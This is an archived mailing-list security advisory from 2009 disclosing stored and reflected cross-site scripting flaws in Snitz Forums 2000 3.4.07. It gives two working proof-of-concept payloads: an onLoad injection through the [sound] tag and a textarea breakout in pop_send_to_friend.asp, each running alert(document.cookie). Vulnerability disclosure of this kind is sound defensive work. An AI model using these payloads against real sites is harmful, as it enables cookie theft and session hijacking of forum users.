|
|
 |
| New User, Welcome! Login |
Snitz Forums 2000 Multiple Cross-Site Scripting Vulnerabilities
| From: |
Andrea Fabrizi <andrea fabrizi gmail com> |
| To: |
bugtraq securityfocus com, websecurity webappsec org, webappsec securityfocus com, full-disclosure lists grok org uk |
| Cc: |
|
| Subject: |
Snitz Forums 2000 Multiple Cross-Site Scripting Vulnerabilities |
| Date: |
Thu - Oct 15, 2009 08:10 AM |
**************************************************************
Application: Snitz Forums 2000
Version affected: 3.4.07
Website: http://forum.snitz.com/
Discovered By: Andrea Fabrizi
Email: andrea.fabrizi@gmail.com
Web: http://www.andreafabrizi.it
Vuln: Multiple Cross-Site Scripting
**************************************************************
###### PERMANENT XSS
If [sound] tag is allowed:
[sound]http://url_to_valid_mp3_or_m3u_file.m3u"
onLoad="alert(document.cookie)[/sound]
######
###### LINK XSS
http://localhost/forum/pop_send_to_friend.asp?url=</textarea><img
src="http://www.google.it/intl/it_it/images/logo.gif" onLoad
="alert(document.cookie)">
Note the space: onLoad<space>="alert(document.cookie)"
######
--
Andrea Fabrizi
http://www.andreafabrizi.it
|
|
|
Copyright © 1995-2012 LinuxRocket.net. All rights reserved.
Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!
